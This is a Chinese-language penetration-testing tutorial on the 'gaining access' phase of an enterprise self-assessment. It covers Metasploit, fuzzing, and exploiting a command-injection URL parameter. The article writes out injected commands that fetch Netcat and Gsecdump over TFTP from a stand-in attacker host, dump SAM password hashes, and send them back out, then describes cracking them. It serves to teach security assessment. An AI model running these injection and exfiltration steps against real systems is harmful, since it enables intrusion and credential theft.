在文章《企業(yè)如何自行檢查漏洞之掃描與枚舉》中我們講到如何找到企業(yè)系統(tǒng)中的漏洞，并有效地揭示這些漏洞。時到今日，破壞一個網(wǎng)絡(luò)或信息系統(tǒng)的基本過程并沒有太多變化。這些步驟基本說來就是：1、執(zhí)行偵察；2、掃描和枚舉；3、獲得訪問權(quán)；4、提升特權(quán)；5、維持訪問并掩蓋蹤跡。下面，我們就具體介紹一下第三步“獲得訪問權(quán)”。

獲得訪問權(quán)

現(xiàn)在可以決定是否對SMB服務(wù)器進行有效攻擊了。遠(yuǎn)程利用某種有漏洞服務(wù)的一個常用工具是Metasploit，這是一個開源的靈活且易于使用的漏洞利用框架。

與Nessus很相似，Metasploit擁有Web界面和一個支持用戶選擇目標(biāo)或網(wǎng)絡(luò)的向?qū)?。安全評估者可以跳過向?qū)В_始遠(yuǎn)程利用SMB服務(wù)器的漏洞，然后，你會看到一個在遠(yuǎn)程機器上的命令提示符，而這正是黑客的最愛。在“自攻”期間，真希望你的系統(tǒng)不會達(dá)到這一步。

記住，不管是出于什么目的和意圖，任何服務(wù)或端口都可能存在足以破壞主機的漏洞。你應(yīng)當(dāng)檢查掃描報告中發(fā)現(xiàn)的所有問題，并不斷地重復(fù)這些步驟直至檢查完每一個項目。

例如，掃描報告出現(xiàn)這樣的內(nèi)容：

2869/tcp - http Microsoft HTTP API httpd 1.0 (SSDP/UPnP)

雖然Nmap可能無法獲得哪些程序正在運行的信息，但這兒需要注意的關(guān)鍵字母是“API”，即“應(yīng)用編程接口”。因而，我們幾乎可以肯定：這里有一個通過Windows的HTTP服務(wù)而起作用的特定應(yīng)用程序。

定制的應(yīng)用程序帶來了特殊困難，因為并沒有哪種特定工具可以攻擊這種程序。在這兒，不妨考慮一下Fuzzing這種軟件測試技術(shù)，它一般是自動化或半自動化的，能夠?qū)⒎欠ǖ?、非正常的或隨機數(shù)據(jù)提交給某個計算機程序的輸入。然后，監(jiān)視該程序的例外情況，如崩潰或無法實現(xiàn)內(nèi)建的代碼功能，或者查找潛在的內(nèi)存泄露等。Fuzzing確實重視定制的應(yīng)用或不尋常的程序?qū)崿F(xiàn)。

還有，請求訪問http://123.123.123.123:2869返回了一個404“not found(未發(fā)現(xiàn))”的錯誤。這就表明，有可能存在我們可以訪問的目錄或命令，而這正是JBroFuzz顯示身手的地方。

使用JBroFuzz,你可以通過任何方法攻擊一個特定的應(yīng)用程序，其中包括用戶代理字符串(用來辨別瀏覽器版本以及向用戶所訪問的網(wǎng)站服務(wù)器提供某些系統(tǒng)信息的細(xì)節(jié))、方法，以及get和post變量等。在很多情況下，這不是一個能否攻破目標(biāo)的問題，而是什么時候攻破的問題。并非所有的錯誤或例外都會導(dǎo)致遠(yuǎn)程的漏洞利用，但評估人員應(yīng)當(dāng)仔細(xì)檢查任何問題，以便于發(fā)現(xiàn)風(fēng)險。本文的測試涉及到HTTP，但許多協(xié)議都足以導(dǎo)致攻擊網(wǎng)絡(luò)服務(wù)和本地服務(wù)。如果你需要更多的靈活性，不妨考慮Peachfuzzer。

在本文的測試中，作者發(fā)現(xiàn)了這個URL：

http://123.123.123.123:2869/cmd=echo%20%22log%20entry%20%251%22%20%3E%20ap p.log%20

如果我們使用一個WebScarab或JBroFuzz編碼器之類的工具來解碼這個URL，就可以看出，“cmd”變成了“log entry%1”>app.log

這里看起來是通過操作系統(tǒng)的命令行將消息發(fā)送給app.log文件，從而建立一個日志文件，也就是說，Web服務(wù)器的服務(wù)正在調(diào)用文件系統(tǒng)。這種類型的直接訪問可以創(chuàng)建某些漏洞掃描器可能遺漏的漏洞利用條件。

這也會給攻擊者提供了機會，但首先還得解決其它問題。有多數(shù)情況下，Web并不會以管理員特權(quán)的方式來運行。不管你如何獲得系統(tǒng)的訪問權(quán)，都可使用這些命令。這些命令僅要求你能夠訪問命令解釋器。

>test命令可以驗證我們的攻擊是否提供反饋(例如，并不把test當(dāng)作內(nèi)部或外部命令、可操作的程序或批處理文件)。

如果我們得到錯誤消息，就會從攻擊中獲得結(jié)果。

在我們的Web攻擊中，我們可以簡單地在瀏覽器地址欄中輸入：http://123.123.123.123:2869/?cmd=test

這會導(dǎo)致瀏覽器返回一個錯誤。否則，就意味著我們不會得到實時反饋。

下一步的測試是查看我們是誰：

http:// 123.123.123.123:2869/?cmd=whoami

此時的響應(yīng)會告訴我們用戶賬戶的名稱，即Web服務(wù)的運行賬戶?，F(xiàn)在，我們看看組成員身份是什么：

http:// 123.123.123.123:2869/?cmd=net user

這時的響應(yīng)與下圖類似：

可以看出，此時并沒有以管理員身份運行，這會給黑客帶來問題。事實上，在黑客獲得了系統(tǒng)訪問后，特權(quán)提升幾乎總會成為攻擊者的首要目標(biāo)。攻擊者可通過多種方法實現(xiàn)此目標(biāo)，其中包括暴力破解管理員賬戶。有時，攻擊者可能會利用操作系統(tǒng)或已安裝軟件中的本地漏洞來擴大訪問權(quán)。

在此例中，我們(攻擊者)擁有了操作系統(tǒng)的命令訪問權(quán)，而且我們也可以訪問文件系統(tǒng)。因而，我們可以通過迂回戰(zhàn)術(shù)來獲得管理員賬戶。為有效地占領(lǐng)主機(包括攻克管理員賬戶)，需要做點兒準(zhǔn)備工作。

首先，我們建立一個TFTP(簡單文件傳輸協(xié)議)服務(wù)器。當(dāng)然，這項工作很簡單，網(wǎng)上的教程有很多，在此不贅述。然后，下載下面的幾種工具，并將其放到TFTP的根文件夾中：

Netcat：黑客工具的瑞士軍刀;Gsecdump，允許用戶從SAM(安全賬戶管理器)數(shù)據(jù)庫中析取口令哈希。使用操作系統(tǒng)命令行漏洞，我們將工具下載到目標(biāo)機器中：http://123.123.123.123:2869/?cmd=tftp attackercomputer.com GET *

使用Gsecdump,可以從系統(tǒng)中析取哈希，并導(dǎo)入到一個可發(fā)送給攻擊者機器的文本文件中。http://123.123.123.123:2869/?cmd= gsecdumpv2b5.exe –a > hashes.txt

http://123.123.123.123:2869/?cmd=tftp attackyourcomputer.com PUT hashes.txt hashes.txt

現(xiàn)在，我們需要做的是破解哈希并得到口令。

回到攻擊電腦上，我們可以在Windows下安裝Cain & Abel 或在Linux上安裝John the Ripper。

在使用Cain&Abel的測試中，我們可以輕松地導(dǎo)入文本文件，并可以實施強力攻擊或字典攻擊。(強力攻擊嘗試每一個字符組合，而字典攻擊必須擁有一個包含單詞或單詞變體的文件。)我們還可以使用預(yù)編譯強力攻擊和字典攻擊的彩虹表。當(dāng)然，每種方法都有其好處和缺點，而你應(yīng)當(dāng)首先嘗試字典攻擊，因為其速度很快。但這種攻擊不太全面。

有時，要破解一個口令可能需要幾天或幾星期的時間。如果一個口令使用了復(fù)雜規(guī)則，那么，你可能畢生也無法破解。